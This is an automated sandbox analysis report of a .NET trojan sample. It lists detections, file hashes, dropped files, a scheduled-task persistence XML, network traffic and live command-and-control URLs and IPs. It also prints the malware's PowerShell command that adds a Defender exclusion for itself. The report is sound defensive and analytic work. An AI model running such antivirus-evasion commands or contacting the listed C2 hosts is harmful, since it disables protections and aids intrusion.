            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

            [Behavior graph: ID 755940, Sample: SecuriteInfo.com.Win32.Cryp..., Startdate: 29/11/2022, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe | 29% | ReversingLabs | Win32.Trojan.Swotter
            SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe | 100% | Joe Sandbox ML

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe | 100% | Joe Sandbox ML
            C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe | 29% | ReversingLabs | Win32.Trojan.Swotter

            Source | Detection | Scanner | Label | Link | Download
            9.0.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File

            No Antivirus matches

            Source | Detection | Scanner | Label | Link
            http://www.sajatypeworks.comiv | 0% | URL Reputation | safe
            http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
            http://www.founder.com.c | 0% | URL Reputation | safe
            http://www.tiro.com | 0% | URL Reputation | safe
            http://www.goodfont.co.kr | 0% | URL Reputation | safe
            http://www.carterandcone.coml | 0% | URL Reputation | safe
            http://www.sajatypeworks.com | 0% | URL Reputation | safe
            http://www.typography.netD | 0% | URL Reputation | safe
            http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
            http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
            http://fontfabrik.com | 0% | URL Reputation | safe
            http://www.founder.com.cn/cn | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
            http://www.fontbureau.como | 0% | URL Reputation | safe
            http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
            http://www.sandoll.co.kr | 0% | URL Reputation | safe
            http://www.urwpp.deDPlease | 0% | URL Reputation | safe
            http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
            http://www.sajatypeworks.come | 0% | URL Reputation | safe
            http://www.sakkal.com | 0% | URL Reputation | safe
            http://www.somethingyourselves.com/n2hm/?bN=9gwJr9Ib0rEc+KDTQOrHkeZIL+750DWB0cIboGlmlHlNjyJ/Euut2Sz1G3s+yPgqLfhiB/VwLZOXrNsbN5gXgWVJl9cnSs3fxA==&TpfpO=3fCD1To0u | 100% | Avira URL Cloud | malware
            www.madamkikkiey.net/n2hm/ | 100% | Avira URL Cloud | malware


Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.somethingyourselves.com | 103.193.185.8 | true | true | | unknown
www.alrt.info | 80.92.205.131 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://www.somethingyourselves.com/n2hm/?bN=9gwJr9Ib0rEc+KDTQOrHkeZIL+750DWB0cIboGlmlHlNjyJ/Euut2Sz1G3s+yPgqLfhiB/VwLZOXrNsbN5gXgWVJl9cnSs3fxA==&TpfpO=3fCD1To0u | true | Avira URL Cloud: malware | unknown
www.madamkikkiey.net/n2hm/ | true | Avira URL Cloud: malware | low

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
103.193.185.8 | www.somethingyourselves.com | Hong Kong | | 45382 | EHOSTIDC-AS-KREHOSTICTKR | true

                                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                                          Analysis ID:755940
                                                          Start date and time:2022-11-29 10:40:48 +01:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 11m 25s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:20
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@21/12@2/1
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:
                                                          • Successful, ratio: 8.3% (good quality ratio 7.7%)
                                                          • Quality average: 65.2%
                                                          • Quality standard deviation: 27.3%
                                                          HCA Information:
                                                          • Successful, ratio: 96%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                                          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
10:41:52 | API Interceptor | 1x Sleep call for process: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe modified
10:41:57 | API Interceptor | 59x Sleep call for process: powershell.exe modified
10:41:59 | Task Scheduler | Run new task: FqJXaFxwEj path: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
10:42:13 | API Interceptor | 1x Sleep call for process: FqJXaFxwEj.exe modified

                                                          No context
                                                          Process:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.355304211458859
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.355304211458859
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                          Malicious:true
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):21856
                                                          Entropy (8bit):5.597980730393762
                                                          Encrypted:false
                                                          SSDEEP:384:ttCRLq0UNVQruXgFseVSjnWjulrItGiJ9gVSJ3uyV1xm0ZOAVrdTs0c8A+iRYg:rXgToWClrSmVcu6Lng
                                                          MD5:84C44110AE1D79E1CAF451F6E381CEE6
                                                          SHA1:1A92B2ABA0161D4DD3C807D665E08E25C8DD6E99
                                                          SHA-256:D0024E0C27DC567BD3601940C8653CED465C588B384F4D9794338015D5E83D1B
                                                          SHA-512:7DF5287755D2600CE7B42487AEE31331AE78A06709076FC9C03DC6985B447F7CD3A102757D7B1746A009CD7315E0928F1DEF0338F1A5C92A76AAEB7BFCD3B263
                                                          Malicious:false
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2880737026424216
                                                          Encrypted:false
                                                          SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                          MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                          SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                          SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                          SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                          Malicious:false
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview:1
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview:1
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          File Type:XML 1.0 document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1597
                                                          Entropy (8bit):5.151490154385564
                                                          Encrypted:false
                                                          SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtazxvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTkv
                                                          MD5:936AEB32A643A82E85DFCB00D9B2AA81
                                                          SHA1:B9EAB79BC7BF79BB7097BA973F1DED9D0917D91F
                                                          SHA-256:BC771042757EC4CFD44ACEF348DB5FB4069AC67AFB5D63C67D89D05F69B29012
                                                          SHA-512:E1C7CD33F0591756621BFC30035B07A34EE870749023BD71979D7C9DBD019E96E09CD66E17366891018BF3A43FAC0DDD1C55FD16D7880E0F840BB309344464B3
                                                          Malicious:true
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                          Process:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          File Type:XML 1.0 document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1597
                                                          Entropy (8bit):5.151490154385564
                                                          Encrypted:false
                                                          SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtazxvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTkv
                                                          MD5:936AEB32A643A82E85DFCB00D9B2AA81
                                                          SHA1:B9EAB79BC7BF79BB7097BA973F1DED9D0917D91F
                                                          SHA-256:BC771042757EC4CFD44ACEF348DB5FB4069AC67AFB5D63C67D89D05F69B29012
                                                          SHA-512:E1C7CD33F0591756621BFC30035B07A34EE870749023BD71979D7C9DBD019E96E09CD66E17366891018BF3A43FAC0DDD1C55FD16D7880E0F840BB309344464B3
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):914944
                                                          Entropy (8bit):7.637536160349333
                                                          Encrypted:false
                                                          SSDEEP:12288:0cAqU+IQ+9ex4JzGcE3mcN553siNii9+M7SJNlMQ8LYbm8fv+/nFRDdzoa1cfN:dB+NdrE3mID3hlnSZMQ8UP+/FRDdEPf
                                                          MD5:55D6460392408D1325C18B69A91C28E3
                                                          SHA1:405847D03BE406A0025EDA76852DFD46420A8D7A
                                                          SHA-256:D1E9780A620DDF149C2AED319388BCA7ED690C2A58C9FFC8F60B1C4515115DC9
                                                          SHA-512:D0795DBF40D938EF236EF04A21836A95B49357D7A8F627E346BCACE64E36EF8E3399C110D49FA5153F232938D0C5ACFA197F8FBBA9A15EA3BC50945287703C10
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............0.................. ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......<...........l...8u..............................................^..}.....(.......(.....*.0...........s......o......(.....*...0...........s......o......(.....*...0...........s......o......(.....*...0...........s......o......(.....*...0..+.........,..{.......+....,...{....o........(.....*..0..r.............(....s......s....}.....s....}.....s....}.....s....}.....(......{....(....o......{.....o......{.....o .....{....r...p"..@A...s!...o".....{....(#...o$.....{.... .... ..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.637536160349333
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          File size:914944
                                                          MD5:55d6460392408d1325c18b69a91c28e3
                                                          SHA1:405847d03be406a0025eda76852dfd46420a8d7a
                                                          SHA256:d1e9780a620ddf149c2aed319388bca7ed690c2a58c9ffc8f60b1c4515115dc9
                                                          SHA512:d0795dbf40d938ef236ef04a21836a95b49357d7a8f627e346bcace64e36ef8e3399c110d49fa5153f232938d0c5acfa197f8fbba9a15ea3bc50945287703c10
                                                          SSDEEP:12288:0cAqU+IQ+9ex4JzGcE3mcN553siNii9+M7SJNlMQ8LYbm8fv+/nFRDdzoa1cfN:dB+NdrE3mID3hlnSZMQ8UP+/FRDdEPf
                                                          TLSH:3815DF8033A6AF72F568A7F37811814867763C6EA5F1D2285DDEB0DE2672B4049F1B13
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............0.................. ... ....@.. .......................`............@................................
                                                          Icon Hash:00828e8e8686b000
                                                          Entrypoint:0x4e0c0a
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6385AB92 [Tue Nov 29 06:49:54 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          Name | Virtual Address | Virtual Size | Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe0bb8 | 0x4f | .text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe2000 | 0x388 | .rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe4000 | 0xc | .reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                          .text | 0x2000 | 0xdec10 | 0xdee00 | False | 0.82092045534212 | data | 7.644411619658559 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc | 0xe2000 | 0x388 | 0x400 | False | 0.3701171875 | data | 2.8517259772227463 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc | 0xe4000 | 0xc | 0x200 | False | 0.044921875 | data | 0.07763316234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          Name | RVA | Size | Type | Language | Country
                                                          RT_VERSION | 0xe2058 | 0x32c | data | |
                                                          DLL | Import
                                                          mscoree.dll | _CorExeMain
                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Nov 29, 2022 10:43:45.623158932 CET | 49697 | 80 | 192.168.2.4 | 103.193.185.8
                                                          Nov 29, 2022 10:43:45.951808929 CET | 80 | 49697 | 103.193.185.8 | 192.168.2.4
                                                          Nov 29, 2022 10:43:45.952020884 CET | 49697 | 80 | 192.168.2.4 | 103.193.185.8
                                                          Nov 29, 2022 10:43:45.952260971 CET | 49697 | 80 | 192.168.2.4 | 103.193.185.8
                                                          Nov 29, 2022 10:43:46.280527115 CET | 80 | 49697 | 103.193.185.8 | 192.168.2.4
                                                          Nov 29, 2022 10:43:46.286369085 CET | 80 | 49697 | 103.193.185.8 | 192.168.2.4
                                                          Nov 29, 2022 10:43:46.286412954 CET | 80 | 49697 | 103.193.185.8 | 192.168.2.4
                                                          Nov 29, 2022 10:43:46.286636114 CET | 49697 | 80 | 192.168.2.4 | 103.193.185.8
                                                          Nov 29, 2022 10:43:46.286794901 CET | 49697 | 80 | 192.168.2.4 | 103.193.185.8
                                                          Nov 29, 2022 10:43:46.615053892 CET | 80 | 49697 | 103.193.185.8 | 192.168.2.4
                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Nov 29, 2022 10:43:45.359435081 CET | 50911 | 53 | 192.168.2.4 | 8.8.8.8
                                                          Nov 29, 2022 10:43:45.616997957 CET | 53 | 50911 | 8.8.8.8 | 192.168.2.4
                                                          Nov 29, 2022 10:43:51.664194107 CET | 59683 | 53 | 192.168.2.4 | 8.8.8.8
                                                          Nov 29, 2022 10:43:51.709604025 CET | 53 | 59683 | 8.8.8.8 | 192.168.2.4
                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                          Nov 29, 2022 10:43:45.359435081 CET | 192.168.2.4 | 8.8.8.8 | 0x8b5f | Standard query (0) | www.somethingyourselves.com | A (IP address) | IN (0x0001) | false
                                                          Nov 29, 2022 10:43:51.664194107 CET | 192.168.2.4 | 8.8.8.8 | 0x7543 | Standard query (0) | www.alrt.info | A (IP address) | IN (0x0001) | false
                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                          Nov 29, 2022 10:43:45.616997957 CET | 8.8.8.8 | 192.168.2.4 | 0x8b5f | No error (0) | www.somethingyourselves.com | | 103.193.185.8 | A (IP address) | IN (0x0001) | false
                                                          Nov 29, 2022 10:43:51.709604025 CET | 8.8.8.8 | 192.168.2.4 | 0x7543 | No error (0) | www.alrt.info | | 80.92.205.131 | A (IP address) | IN (0x0001) | false
                                                          • www.somethingyourselves.com


                                                          Target ID:0
                                                          Start time:10:41:45
                                                          Start date:29/11/2022
                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          Imagebase:0x960000
                                                          File size:914944 bytes
                                                          MD5 hash:55D6460392408D1325C18B69A91C28E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.359675878.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.361866159.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          Target ID:1
                                                          Start time:10:41:54
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          Imagebase:0x180000
                                                          File size:430592 bytes
                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          Target ID:2
                                                          Start time:10:41:54
                                                          Start date:29/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7c72c0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
